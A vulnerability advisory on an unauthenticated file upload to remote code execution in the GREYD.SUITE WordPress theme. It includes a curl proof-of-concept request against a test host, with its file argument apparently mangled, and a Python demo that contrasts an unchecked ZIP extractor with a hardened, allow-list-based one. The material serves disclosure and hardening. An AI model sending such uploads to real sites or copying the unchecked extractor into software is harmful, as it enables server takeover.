wpexploit | Bernhard Kau | WPEX-ID: C330F92B-1E21-414F-B316-D5E97CB62BD1
History: Jul 21, 2022 - 12:00 a.m.

GREYD.SUITE < 1.2.7 - Unauthenticated File Upload to RCE


EPSS: 0.005 (Low), Percentile: 77.1%

The theme does not properly validate uploaded custom font packages and performs no authorization or CSRF checks, so an unauthenticated attacker can upload arbitrary files, including PHP source files, leading to possible remote code execution (RCE). Version 1.2.5 added CSRF checks.

Send a POST request to the wp-content/themes/greyd_suite/inc/customizer_ff.php file with the POST parameters below and a ZIP file containing a CSS file plus any other content of your choosing:

curl --location --request POST 'https://theme-tests.docker.test/wp-content/themes/greyd_suite/inc/customizer_ff.php' \
--form 'mode="upload"' \
--form 'uploadpath="hackpath"' \
--form 'name_full="hackname"' \
--form '[email protected];type=application/zip'

This extracts the archive into wp-content/themes/greyd_suite/inc/hackpath/hack/ without any check of the files it contains, so a PHP file placed in the ZIP ends up under the web root and can be requested directly.

From version 1.2.5, the uploaded files are found in wp-content/uploads/greyd_tp/custom_fonts/hack/ instead.
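The following is an added illustration, not code from the advisory or from the GREYD.SUITE theme. It models the two halves of the issue described above: an extractor that writes every ZIP member to disk regardless of name (the vulnerable behaviour), beside a hardened extractor that validates each member name against an allow-list of font-package extensions and rejects traversal, absolute paths and anything with `.php` in the file name before writing a single byte. The allow-list, the file names and the sample package contents are assumptions for the demo; the real theme's form field names and storage paths are not modelled. Note that Python's `zipfile` already strips leading slashes and `..` components on extraction, so in this demo the dangerous payload is the `.php` member rather than a traversal name; the name checks are still shown because an extractor in another language may not get them for free.

```python
import io
import os
import posixpath
import re
import tempfile
import zipfile

# Assumed allow-list of what a custom font package legitimately contains.
# Anything else, notably .php, is rejected outright.
ALLOWED_EXTENSIONS = {".css", ".woff", ".woff2", ".ttf", ".otf", ".eot", ".svg"}


def build_font_package(extra_files=None):
    """Construct a sample font package in memory (constructed test data,
    not a real upload): a CSS file, a placeholder font, plus any extra
    members the caller supplies, e.g. a trojaned PHP file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("hack/font.css", "@font-face { font-family: 'hack'; src: url('hack.woff2'); }\n")
        zf.writestr("hack/hack.woff2", b"wOF2")  # placeholder font bytes
        for name, data in (extra_files or {}).items():
            zf.writestr(name, data)
    return buf.getvalue()


def _list_files(dest):
    """Relative, forward-slash paths of every file under dest, sorted."""
    out = []
    for root, _, files in os.walk(dest):
        for f in files:
            out.append(os.path.relpath(os.path.join(root, f), dest).replace(os.sep, "/"))
    return sorted(out)


def extract_unchecked(zip_bytes, dest):
    """The vulnerable behaviour: every member is written to disk,
    whatever its extension. A hack.php inside the ZIP lands next to font.css."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
    return _list_files(dest)


def check_member_name(name):
    """Return None if the member name is acceptable, otherwise the reason it is not."""
    normalized = name.replace("\\", "/")
    if normalized.startswith("/") or re.match(r"^[A-Za-z]:", normalized):
        return "absolute path"
    if any(part == ".." for part in normalized.split("/")):
        return "path traversal"
    if normalized.endswith("/"):
        return None  # directory entry, nothing is written for it
    basename = posixpath.basename(normalized).lower()
    # Reject any dotted ".php" segment, not just the last extension:
    # Apache's mod_mime can hand shell.php.css to the PHP handler.
    if ".php" in basename:
        return "php in filename"
    ext = posixpath.splitext(basename)[1]
    if ext not in ALLOWED_EXTENSIONS:
        return f"disallowed extension {ext or '(none)'}"
    return None


def extract_checked(zip_bytes, dest):
    """Hardened extraction: validate every member name first, then extract.
    Raises ValueError on the first bad member so the whole package is refused."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            reason = check_member_name(info.filename)
            if reason is not None:
                raise ValueError(f"rejected {info.filename!r}: {reason}")
        zf.extractall(dest)
    return _list_files(dest)


def demo():
    """Run both extractors over a benign and a trojaned package and report
    what actually reached disk in each case."""
    benign = build_font_package()
    trojaned = build_font_package({"hack/hack.php": b"<?php echo 'executed'; ?>"})
    results = {}
    with tempfile.TemporaryDirectory() as d:
        results["unchecked_trojaned"] = extract_unchecked(trojaned, d)
    with tempfile.TemporaryDirectory() as d:
        try:
            extract_checked(trojaned, d)
            results["checked_trojaned"] = "accepted"
        except ValueError as e:
            results["checked_trojaned"] = str(e)
        results["checked_trojaned_files"] = _list_files(d)
    with tempfile.TemporaryDirectory() as d:
        results["checked_benign"] = extract_checked(benign, d)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running `demo()` shows `hack/hack.php` written by the unchecked extractor, the same package refused by the checked one with an empty destination directory, and the benign package extracted normally. In the real fix the name validation belongs alongside a capability check and a nonce check on the upload handler; validating the archive alone does not address the missing authorization the advisory describes.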
